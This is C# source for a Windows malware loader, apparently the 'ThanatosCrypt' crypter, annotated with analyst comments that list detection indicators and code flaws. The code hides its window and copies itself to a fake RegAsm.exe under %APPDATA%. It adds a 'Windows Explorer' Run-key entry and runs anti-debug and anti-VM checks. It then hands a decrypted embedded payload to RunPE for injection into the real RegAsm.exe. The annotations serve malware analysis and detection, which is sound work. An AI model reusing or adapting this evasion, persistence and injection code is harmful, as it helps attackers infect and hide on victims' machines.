// Install location used by EnvSetup()/AddStartup(): a directory under the user's
// roaming %APPDATA% whose name mimics a system component, plus an executable
// inside it named after the legitimate .NET RegAsm tool. The genuine RegAsm.exe
// lives in the runtime directory (see the RuntimeEnvironment.GetRuntimeDirectory()
// call in Form1()), so a RegAsm.exe under %APPDATA% is itself a hunting indicator.
public static string installDir = Environment.GetEnvironmentVariable("appdata") + "\\Windows .NET Framework";
public static string installLoc = installDir + "\\RegAsm.exe";
// Benign-looking value name written under the Run key by AddStartup().
public static string myreg = "Windows Explorer";
/// <summary>
/// Persistence: registers <see cref="installLoc"/> under a CurrentVersion\Run key
/// so it is started at logon. Tries HKLM first; only if the value already exists
/// there does it try HKCU (and then HKLM a second time). Every failure is swallowed,
/// so the caller gets no signal whether persistence succeeded.
/// </summary>
/// <remarks>
/// Detection: a Run value named "Windows Explorer" whose data points under %APPDATA%,
/// in either HKLM or HKCU ...\CurrentVersion\Run.
/// Control-flow note: the HKCU branch sits inside the <c>else</c> of the HKLM check,
/// so it is reached only when the HKLM value is already present. If the writable
/// HKLM open itself fails (it normally requires administrative rights), execution
/// lands in the outer <c>catch</c> and no HKCU fallback is attempted.
/// </remarks>
public static void AddStartup()
{
    try
    {
        // Writable open of the machine-wide Run key; a failed open ends in the
        // outer catch below (and a null return would throw on the next line).
        RegistryKey sKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
        if (sKey.GetValue(myreg) == null)
        {
            sKey.SetValue(myreg, installLoc);
            sKey.Close();
        }
        else
        {
            // HKLM value already exists: additionally write the per-user Run key.
            try
            {
                RegistryKey cKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                if (cKey.GetValue(myreg) == null)
                {
                    cKey.SetValue(myreg, installLoc);
                }
                else { }
            }
            catch { }
            // Redundant: the HKLM value was just found to be non-null, so this
            // block never writes. Keys opened in these two blocks are never closed.
            try
            {
                RegistryKey cKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
                if (cKey.GetValue(myreg) == null)
                {
                    cKey.SetValue(myreg, installLoc);
                }
                else { }
            }
            catch { }
        }
    }
    catch { }
}
/// <summary>
/// Installation step: if the running assembly is not already at
/// <see cref="installLoc"/>, creates <see cref="installDir"/> and copies the
/// current executable there, then calls <see cref="AddStartup"/> to register
/// that copy under a Run key. Copy errors (including File.Copy refusing to
/// overwrite an existing file) are silently swallowed; AddStartup() runs regardless.
/// </summary>
/// <remarks>
/// Detection: creation of "%APPDATA%\Windows .NET Framework\RegAsm.exe" by a
/// process that is not a .NET installer. The location comparison is an ordinal,
/// case-sensitive string equality, so a path differing only in case is treated
/// as "not installed" and the copy is attempted again.
/// </remarks>
public static void EnvSetup()
{
    if (System.Reflection.Assembly.GetExecutingAssembly().Location != installLoc)
    {
        try
        {
            if (!Directory.Exists(installDir))
            {
                Directory.CreateDirectory(installDir);
            }
            // No overwrite flag: throws (and is swallowed) if the copy already exists.
            File.Copy(System.Reflection.Assembly.GetExecutingAssembly().Location, installLoc);
        }
        catch { }
    }
    else { }
    AddStartup();
}
// Anti-debugging imports from kernel32, consumed by the gate in Form1():
// CheckRemoteDebuggerPresent() reports whether a debugger is attached to the
// given process handle; IsDebuggerPresent() reports a user-mode debugger on
// the calling process. Together with Debugger.IsAttached they must all be
// false for the payload path to run.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
public static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
[DllImport("kernel32.dll", CharSet = CharSet.Auto, ExactSpelling = true)]
internal static extern bool IsDebuggerPresent();
/// <summary>
/// Loader entry point disguised as a WinForms constructor. The form is hidden
/// immediately; the constructor then takes a machine-global mutex, runs
/// anti-debug and anti-VM checks, and only when none of them trigger does it
/// hand the decrypted embedded resource to <c>RunPE.Execute</c> and install
/// persistence via <see cref="EnvSetup"/>. It always ends in
/// <c>Environment.Exit(0)</c>, so the form never becomes visible.
/// </summary>
/// <remarks>
/// Analysis note: in an environment that exposes any of the artifacts listed
/// below, or with a debugger attached, the process simply exits 0 without
/// touching the payload or the registry — which is why sandbox detonation of
/// this sample can look inert.
/// Host indicators: the mutex name "Global\{&lt;assembly GUID&gt;}", the Run value
/// written by AddStartup(), and the %APPDATA% copy made by EnvSetup().
/// </remarks>
public Form1()
{
    InitializeComponent();
    // Hide the window; nothing in this constructor ever shows UI.
    SetVisibleCore(false);
    // get application GUID as defined in AssemblyInfo.cs
    string appGuid =
        ((GuidAttribute)Assembly.GetExecutingAssembly().
        GetCustomAttributes(typeof(GuidAttribute), false).
        GetValue(0)).Value.ToString();
    // unique id for global mutex - Global prefix means it is global to the machine
    // (single-instance guard; the name is derived from the assembly GUID and is
    // therefore a stable per-sample indicator)
    string mutexId = string.Format("Global\\{{{0}}}", appGuid);
    // Need a place to store a return value in Mutex() constructor call
    bool createdNew;
    // edited by Jeremy Wiebe to add example of setting up security for multi-user usage
    // edited by 'Marc' to work also on localized systems (don't use just "Everyone")
    var allowEveryoneRule =
        new MutexAccessRule(new SecurityIdentifier(WellKnownSidType.WorldSid
        , null)
        , MutexRights.FullControl
        , AccessControlType.Allow
        );
    var securitySettings = new MutexSecurity();
    securitySettings.AddAccessRule(allowEveryoneRule);
    // edited by MasonGZhwiti to prevent race condition on security settings via VanNguyen
    using (var mutex = new Mutex(false, mutexId, out createdNew, securitySettings))
    {
        // edited by acidzombie24
        var hasHandle = false;
        try
        {
            // note, you may want to time out here instead of waiting forever
            // edited by acidzombie24
            // mutex.WaitOne(Timeout.Infinite, false);
            hasHandle = mutex.WaitOne(5000, false);
            // Only AbandonedMutexException is caught below, so a second instance
            // that times out lets this TimeoutException escape the constructor.
            if (hasHandle == false)
                throw new TimeoutException("Timeout waiting for exclusive access");
        }
        catch (AbandonedMutexException)
        {
            // Log the fact that the mutex was abandoned in another process,
            // it will still get acquired
            hasHandle = true;
        }
        // Anti-debug probe on our own process handle; result checked at the gate below.
        bool isRemoteDebuggerPresent = false;
        CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isRemoteDebuggerPresent);
        // Anti-VM/sandbox evidence collection. Any entry added to this list
        // suppresses the payload path.
        List<string> EvidenceOfSandbox = new List<string>();
        // Hypervisor/product substrings searched for in registry values below.
        List<string> sandboxStrings = new List<string> { "vmware", "virtualbox", "vbox", "qemu", "xen" };
        // Keys whose mere existence is treated as evidence of VMware/VirtualBox.
        string[] HKLM_Keys_To_Check_Exist = {@"HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0\Identifier",
        @"SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S",
        @"SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev",
        @"SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers",
        @"SOFTWARE\VMWare, Inc.\VMWare Tools",
        @"SOFTWARE\Oracle\VirtualBox Guest Additions",
        @"HARDWARE\ACPI\DSDT\VBOX_"};
        // "key\valueName" paths whose string data is scanned for sandboxStrings.
        string[] HKLM_Keys_With_Values_To_Parse = {@"SYSTEM\ControlSet001\Services\Disk\Enum\0",
        @"HARDWARE\Description\System\SystemBiosInformation",
        @"HARDWARE\Description\System\VideoBiosVersion",
        @"HARDWARE\Description\System\SystemManufacturer",
        @"HARDWARE\Description\System\SystemProductName",
        @"HARDWARE\Description\System\Logical Unit Id 0"};
        foreach (string HKLM_Key in HKLM_Keys_To_Check_Exist)
        {
            // Read-only open; handle is never closed.
            RegistryKey OpenedKey = Registry.LocalMachine.OpenSubKey(HKLM_Key, false);
            if (OpenedKey != null)
            {
                EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key);
            }
        }
        foreach (string HKLM_Key in HKLM_Keys_With_Values_To_Parse)
        {
            // Filesystem path helpers are (ab)used to split the registry path:
            // last segment = value name, the rest = subkey.
            string valueName = new DirectoryInfo(HKLM_Key).Name;
            try
            {
                // Throws (and is swallowed) if the subkey is missing or the value
                // is not a string (the cast is unchecked).
                string value = (string)Registry.LocalMachine.OpenSubKey(Path.GetDirectoryName(HKLM_Key), false).GetValue(valueName);
                foreach (string sandboxString in sandboxStrings)
                {
                    if (!string.IsNullOrEmpty(value) && value.ToLower().Contains(sandboxString.ToLower()))
                    {
                        EvidenceOfSandbox.Add(@"HKLM:\" + HKLM_Key + " => " + value);
                    }
                }
            }
            catch { }
        }
        // Guest-tools driver/binary paths for VMware and VirtualBox. "Sysnative" is
        // the redirection alias presumably intended to reach System32 from a 32-bit
        // process on 64-bit Windows; on a 32-bit OS these paths do not resolve.
        string[] FilePaths = {@"C:\windows\Sysnative\Drivers\Vmmouse.sys",
        @"C:\windows\Sysnative\Drivers\vm3dgl.dll", @"C:\windows\Sysnative\Drivers\vmdum.dll",
        @"C:\windows\Sysnative\Drivers\vm3dver.dll", @"C:\windows\Sysnative\Drivers\vmtray.dll",
        @"C:\windows\Sysnative\Drivers\vmci.sys", @"C:\windows\Sysnative\Drivers\vmusbmouse.sys",
        @"C:\windows\Sysnative\Drivers\vmx_svga.sys", @"C:\windows\Sysnative\Drivers\vmxnet.sys",
        @"C:\windows\Sysnative\Drivers\VMToolsHook.dll", @"C:\windows\Sysnative\Drivers\vmhgfs.dll",
        @"C:\windows\Sysnative\Drivers\vmmousever.dll", @"C:\windows\Sysnative\Drivers\vmGuestLib.dll",
        @"C:\windows\Sysnative\Drivers\VmGuestLibJava.dll", @"C:\windows\Sysnative\Drivers\vmscsi.sys",
        @"C:\windows\Sysnative\Drivers\VBoxMouse.sys", @"C:\windows\Sysnative\Drivers\VBoxGuest.sys",
        @"C:\windows\Sysnative\Drivers\VBoxSF.sys", @"C:\windows\Sysnative\Drivers\VBoxVideo.sys",
        @"C:\windows\Sysnative\vboxdisp.dll", @"C:\windows\Sysnative\vboxhook.dll",
        @"C:\windows\Sysnative\vboxmrxnp.dll", @"C:\windows\Sysnative\vboxogl.dll",
        @"C:\windows\Sysnative\vboxoglarrayspu.dll", @"C:\windows\Sysnative\vboxoglcrutil.dll",
        @"C:\windows\Sysnative\vboxoglerrorspu.dll", @"C:\windows\Sysnative\vboxoglfeedbackspu.dll",
        @"C:\windows\Sysnative\vboxoglpackspu.dll", @"C:\windows\Sysnative\vboxoglpassthroughspu.dll",
        @"C:\windows\Sysnative\vboxservice.exe", @"C:\windows\Sysnative\vboxtray.exe",
        @"C:\windows\Sysnative\VBoxControl.exe"};
        foreach (string FilePath in FilePaths)
        {
            if (File.Exists(FilePath))
            {
                EvidenceOfSandbox.Add(FilePath);
            }
        }
        // MAC OUI prefixes commonly associated with VMware and VirtualBox virtual NICs.
        // The check is a substring match on the whole address, not a prefix match.
        string[] badMacAddresses = { @"000C29", @"001C14", @"005056", @"000569", @"080027" };
        NetworkInterface[] NICs = NetworkInterface.GetAllNetworkInterfaces();
        foreach (NetworkInterface NIC in NICs)
        {
            foreach (string badMacAddress in badMacAddresses)
            {
                if (NIC.GetPhysicalAddress().ToString().ToLower().Contains(badMacAddress.ToLower()))
                {
                    // Stored colon-separated (AA:BB:...) for readability.
                    EvidenceOfSandbox.Add(Regex.Replace(NIC.GetPhysicalAddress().ToString(), ".{2}", "$0:").TrimEnd(':'));
                }
            }
        }
        // Gate: all three debugger probes must be negative and no sandbox evidence
        // collected; otherwise the constructor falls through to Environment.Exit(0).
        if (!IsDebuggerPresent() && !isRemoteDebuggerPresent && !System.Diagnostics.Debugger.IsAttached && EvidenceOfSandbox.Count == 0)
        {
            // RunPE and Decryptor are defined elsewhere (not on this page). Arguments:
            // the path of the genuine RegAsm.exe in the .NET runtime directory, and the
            // embedded string resource ThanatosCrypt.Resource1.primary decrypted with the
            // key bytes of "DSNVLUOHFWE". The name RunPE conventionally denotes running a
            // PE image inside another process; if that holds here, the observable artifact
            // is a RegAsm.exe process whose parent is this executable — verify in RunPE.
            RunPE.Execute(Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "RegAsm.exe"), Decryptor.Decrypt(Encoding.ASCII.GetBytes("DSNVLUOHFWE"), Encoding.Default.GetBytes(ThanatosCrypt.Resource1.primary)));
            // Persistence is installed only after the payload hand-off succeeds.
            EnvSetup();
        }
        // edited by acidzombie24, added if statement
        if (hasHandle)
            mutex.ReleaseMutex();
        // Unconditional exit: the loader process never reaches the message loop.
        Environment.Exit(0);
    }
}
- }